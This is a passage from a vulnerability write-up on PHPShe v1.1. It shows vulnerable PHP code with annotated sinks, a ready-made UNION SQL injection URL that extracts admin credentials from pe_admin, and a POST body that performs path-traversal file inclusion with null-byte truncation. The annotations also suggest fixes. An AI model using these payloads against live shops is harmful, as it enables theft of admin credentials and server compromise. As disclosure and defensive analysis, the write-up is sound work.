0×02 搜索注入（product.php 的 list 分支：GET 参数 keyword 未经转义直接拼入 SQL）
<code id="code2">
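//product.php — product list branch (one case of a switch on the action; the switch header is outside this excerpt)
case 'list':
    // Category id is cast to int, so it is safe to embed in the conditions below.
    $category_id = intval($id);
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // Search: the WHERE fragment is assembled as a plain string and handed to pe_selectall() verbatim.
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // Sub-category ids come from category_cidarr($category_id), not from the request; $category_id is already an int.
        $sqlwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // SINK 1 (SQL injection): the `keyword` query parameter (see the exp below) is interpolated into the
    // LIKE clause with no escaping. Note that the `pay` branch of order.php runs its id through pe_dbhold()
    // (presumably an escaping helper) before use; nothing equivalent happens here. A single quote ends the
    // string, and the exp closes the dangling `%'` with `and '1'='1`. Fix: escape with pe_dbhold(), or bind the value.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'";
    if ($_g_orderby) {
        // SINK 2 (not mentioned in the writeup): orderby (presumably the GET parameter of the same name, by
        // analogy with keyword) is split on `_` and both halves are interpolated into ORDER BY unescaped —
        // a second injection point, restricted only in that the payload cannot contain `_` (and a value
        // without `_` leaves $orderby[1] undefined). Fix: whitelist the column name and the direction.
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // $sqlwhere is passed as a string, so whatever pe_selectall() does with array conditions never applies here.
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // Hot-sale ranking
    $product_hotlist = product_hotlist();
    // Current breadcrumb path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));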
//跟进 selectall 函数库（即上面 list 分支调用的 pe_selectall，DB 类中的方法；类头未在本文展示）
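/**
 * Select all rows of `dbpre.$table` that match $where.
 *
 * @param string       $table      table name without prefix; interpolated into the SQL as-is
 * @param string|array $where      condition — an array goes through _dowhere(); a string evidently
 *                                 reaches the query unchanged (that is what the product search exploit relies on)
 * @param string       $field      column list, default '*'; also interpolated verbatim
 * @param array        $limit_page pagination, forwarded to sql_selectall() untouched
 * @return mixed whatever sql_selectall() returns (not visible in this excerpt)
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // _dowhere() is not shown; given the exploit, assume it only builds/escapes the array form — TODO confirm.
    $sqlwhere = $this->_dowhere($where);
    // Every caller-supplied piece ($table, $field, and a string $where) is concatenated without quoting,
    // so this method is a raw-SQL sink: safety depends entirely on the caller.
    return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}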
//exp (GET 请求)：UNION 的列数必须等于 `select *` 在 pe_product 上返回的列数（此处为 19，目标版本不同需自行调整）；末尾的 and '1'='1 用于闭合 LIKE 子句中残留的 %'
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
</code>3 ^$ v6 e6 n: S6 h
0×03 包含漏洞（order.php 的 pay 分支：POST 参数 info[order_payway] 未经校验直接拼入 include 路径，本地文件包含）
<code id="code3">
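//order.php — payment branch (one case of a switch on the action; the switch header is outside this excerpt)
case 'pay':
    // The order id (GET id, per the exp) is escaped with pe_dbhold() before it reaches SQL.
    $order_id = pe_dbhold($_g_id);

    // Payment methods come from the cache, keyed by payway name (e.g. 'bank'); those keys are the
    // legitimate values of order_payway and would make a simple whitelist for the include below.
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        // Config is stored serialized; it comes from the cache, not from the request.
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            // Collapses CR/LF/TAB into a literal backslash-n (single-quoted), presumably for a JS string — TODO confirm
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }

    // Only unpaid orders reach the rest of the branch, so the only precondition on the attacker is a valid
    // unpaid order id (the one in the exp looks date-sequential — if so it is guessable; confirm).
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');

    if (isset($_p_pesubmit)) {
        // Mass assignment: the whole POST info[] array is written to the order row. Nothing here restricts
        // which columns of `order` the client may set — the exp only needs order_payway, but presumably any
        // column name is accepted (pe_update is not shown).
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {

                $order['order_name'] .= "{$v['product_name']};";
            }

            echo '正在为您连接支付网站,请稍后...';
            // SINK (local file inclusion): order_payway is taken straight from POST and spliced into the include
            // path; pe_dbhold() was applied to $_g_id only, and SQL escaping would not stop `../` anyway.
            // The %00 in the exp relies on null-byte truncation of include paths, which PHP 5.3.4+ rejects;
            // without it the path must still end in /order_pay.php, which is why the writeup calls this a
            // "crippled" inclusion — it needs a local file of that name the attacker can reach.
            // Fix: reject any order_payway not in array_keys($cache_payway) before the update as well as before the include.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        }// the "crippled" inclusion fires only after the update above succeeded

        else {

            pe_error('支付错误...');
        }

    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));

    break;
}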
//exp：先 GET 下面的 URL，再以下一行为表单体 POST（解码后为 info[order_payway]=alipay/../../../1.txt%00&pesubmit=立即支付；pesubmit 必须存在以进入 isset($_p_pesubmit) 分支，%00 截断仅对 PHP 5.3.4 之前的版本有效）
//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001
//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg